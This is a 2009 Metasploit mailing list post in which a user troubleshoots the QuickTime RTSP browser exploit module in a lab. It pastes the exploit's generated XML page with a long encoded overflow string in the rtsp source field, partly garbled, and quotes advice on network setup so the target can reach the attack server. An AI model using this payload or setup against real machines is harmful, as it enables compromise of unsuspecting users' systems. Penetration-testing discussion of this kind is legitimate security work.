Metasploit mailing list archives
query on exploit/windows/browser/apple_quicktime_rtsp
From: nkanaskar at hotmail.com (Nitin Kanaskar)
Date: Mon, 9 Feb 2009 11:04:20 -0600
Thanks HD - finally i got to work something. I ran the exploit, and invoked URL on xp browser. I get a msg on server [*] Sending exploit to 192.168.11.2:10156..... On client side, i get error msg - XML page cannot be displayed. An invalid character was found in text content. Error processing resource 'http:// When i viewed source for the page, it is - <?xml version="1.0"?><?quicktime type="application/x-quicktime-media-link"?><embed autoplay="true" moviename="`OsA" qtnext="`OsA" type="video/quicktime" src="rtsp://`OsA:tMybSkl7F!H,oA.KyK)l~d0.Fhb*KN(!1j0}](B8U3Fhl{vcG_uY0mkk`Z2,|JD0.{jIlEaH;rPaxFXJj9kl)OOFUP#$B*OFl8~59!Kd8_QL_hrATwGO~#-KO7ke(iJfD^8*-^4YyMC6F)`rhDl{oAp83sYff09sBqPCsc2|=dU5T|(0^!0;`W{#FxV{HVJ2FEX$`!sN$z27\l8SH6LYa(M_pmxo0^qY`$LF,^bWMssu4h;SQ!\rp#vHg7GU{XzSrzMSl2G[8Jt\!INCu2uW5gGn]c~{S;gN-kEWJ!iAo9W0Xb!)hR^?k?z?O????~F?=|guN?C?????H$?,??? 0?-zJu|BpG??Kw???t?v???8??f??IxA???r4?{F??-G??????AJy2?s#??~??q(?????=f5*???B} ?,$K???3???C??HO????Ng???I71??????????^?v????????st??`Ey??=??????p1???t?k-?(_#L?_???U???tN?M??????t?k?1??Q?53?=??#(D?kZ?1 ?????G?4?s?????q???n???M`j??rF?I`l??z?a????s?E0qF???E6J???J???J`j?q???J[uq; ???E6s????O?D??S??I???O?P???I??M?E0??]??????E0???q??i????0S3s?3(_IJ???[?)mc?K?????E?]`l?N???H???H????9Q???E.`jkNc9$}`l??O???}???IE0???8G??Uh????" /> I guess all these characters are causing this error. Please correct me if i am wrong. Do i need to tweak the source code of the exploit to fix this? Nitin
From: hdm at metasploit.com CC: framework at spool.metasploit.com Date: Mon, 9 Feb 2009 08:27:20 -0600 Subject: Re: [framework] query on exploit/windows/browser/apple_quicktime_rtsp On Mon, 2009-02-09 at 08:21 -0600, Nitin Kanaskar wrote:I dont see anything happening on the MSF console after 'Server started' msg. Any idea what I am doing wrong? or anything i can do to debug?You need bridging, not NAT, otherwise there is no way for the victim to connect to the web server. -HD _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
_________________________________________________________________ Windows Live?: E-mail. Chat. Share. Get more ways to connect. http://windowslive.com/explore?ocid=TXT_TAGLM_WL_t2_allup_explore_022009 -------------- next part -------------- An HTML attachment was scrubbed... URL: <http://mail.metasploit.com/pipermail/framework/attachments/20090209/2328d41d/attachment.htm>
Current thread:
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp webDEViL (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- Message not available
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp H D Moore (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp MC (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Nitin Kanaskar (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 09)
- query on exploit/windows/browser/apple_quicktime_rtsp Patrick Webster (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp webDEViL (Feb 08)
- query on exploit/windows/browser/apple_quicktime_rtsp Donnie Werner (Feb 09)